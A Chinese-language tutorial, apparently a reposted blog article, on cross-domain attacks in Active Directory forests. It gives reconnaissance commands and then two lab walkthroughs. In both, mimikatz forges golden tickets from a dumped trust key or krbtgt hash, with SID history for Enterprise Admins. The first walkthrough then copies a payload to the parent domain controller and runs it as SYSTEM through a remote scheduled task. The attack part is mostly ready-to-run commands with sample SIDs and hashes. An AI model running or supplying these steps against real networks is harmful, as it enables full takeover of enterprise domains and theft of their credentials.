跨域攻擊的方法介紹
目錄- 跨域攻擊的方法介紹
- 一、內網中的域林
- 二、跨域攻擊方法
- 三、獲取域資訊
- 四、利用域信任密鑰跨域
- 五、利用krbtgt哈希值跨域
一、內網中的域林
很多大型企業都擁有自己的內網,一般通過域林進行共享資源,根據不同職能區分的部門,從邏輯上以主域和子域進行區分,以方便統一管理,在物理層,通常使用防火墻將各個子公司及各個部門劃分為不同的區域,
二、跨域攻擊方法
1、常規滲透方法(利用web漏洞)
2、哈希傳遞票據攻擊
3、利用域信任關系
三、獲取域資訊
在域中,Enterprise Admins組(出現在林中的根域中)的成員具有對目錄林中所有域的完全控制權限,在默認情況下,該組包含林中所有域控制器上具有Administrators權限的成員,
1、查看當前域中計算機的權限
whoami /all
2、查看域信任關系
nltest /domain_trusts
3、使用LG工具獲取域資訊
(1)獲取當前域中的用戶組
LG.exe 域名\.
(2)獲取遠程機器的本地用戶組
LG.exe \\計算機名 -lu
(3)獲取遠程系統中的用戶SID
LG.exe \\計算機名 -lu -sidsout
四、利用域信任密鑰跨域
1、實驗環境
| IP地址 | 所屬域 | 域中地位 | 機器名 | 當前登錄用戶 |
|---|---|---|---|---|
| 192.168.142.10 | candada.com | candada的域控 | DC1 | candada\administrator |
| 192.168.142.20 | test.candada.com | test子域的域控 | DC2 | test\administrator |
| 192.168.142.32 | test.candada.com | test子域的機器 | win10-2 | test\can |
已經控制住DC2和win10-2,目標是進一步控制DC1,
2、實驗步驟
(1)使用mimikatz獲取當前域的SID、父域的SID、子域域管的NTLM信任密鑰,
mimikatz lsadump::trust /patch
mimikatz lsadump::lsa /patch /user:candada$
(2)在普通的域內用戶中創建創建高權限票據
mimikatz kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密鑰 /user:任意用戶 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi
mimikatz kerberos::golden /domain:test.candada.com /sid:S-1-5-21-1283977433-887585873-3504403688 /sids:S-1-5-21-1441271535-139503665-1739510498-519 /rc4:85ebc8bf10bf4e04c20f4b3ce0a553af /user:administrator /service:krbtgt /target:candada.com /ticket:administrator.kirbi
(3)上傳asktgs.exe和kirbikator.exe工具,asktgs.exe偽造票據,kirbikator.exe注入票據
創建CIFS服務的票據和host服務票據
shell asktgs.exe administrator.kirbi cifs/DC1.candada.com
shell asktgs.exe administrator.kirbi host/DC1.candada.com
將票據注入記憶體
shell kirbikator.exe lsa cifs.DC1.candada.com.kirbi
復制檔案的操作
shell copy can1.exe \\dc1.candada.com\c$
shell dir \\dc1.candada.com\c$
(4)進行創建計劃任務
shell schtasks /create /s dc1.candada.com /tn test /sc onstart /tr c:\can1.exe /ru system /f
(5)執行計劃任務
schtasks /run /s dc1.candada.com /i /tn "test"
(6)洗掉計劃任務
shell schtasks /delete /s dc1.candada.com /tn "test" /f
五、利用krbtgt哈希值跨域
1、實驗環境
| IP地址 | 所屬域 | 域中地位 | 機器名 | 當前登錄用戶 |
|---|---|---|---|---|
| 192.168.142.10 | candada.com | candada的域控 | DC1 | candada\administrator |
| 192.168.142.20 | test.candada.com | test子域的域控 | DC2 | test\administrator |
| 192.168.142.32 | test.candada.com | test子域的機器 | win10-2 | test\can |
已經控制住DC2和win10-2,目標是進一步控制DC1,
2、實驗步驟
(1)獲取Krbtgt散列
mimikatz lsadump::lsa /patch /user:krbtgt
(2)獲取當前域的SID、父域的SID
mimikatz lsadump::trust /patch
(3)構造并注入黃金票據
Kerberos::golden /user:administrator /domain:當前域名 /sid:當前SID /sids:目標域SID-519 /krbtgt:krbtgt散列 /ptt
mimikatz Kerberos::golden /user:administrator /domain:test.candada.com /sid:S-1-5-21-1283977433-887585873-3504403688 /sids:S-1-5-21-1441271535-139503665-1739510498-519 /krbtgt:dd30df5d4360179f04471b39ed515274 /ptt
(4)后續可利用計劃任務或者服務進行上線
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/555876.html
標籤:其他
上一篇:C++ 核心指南之資源管理(上)
下一篇:返回列表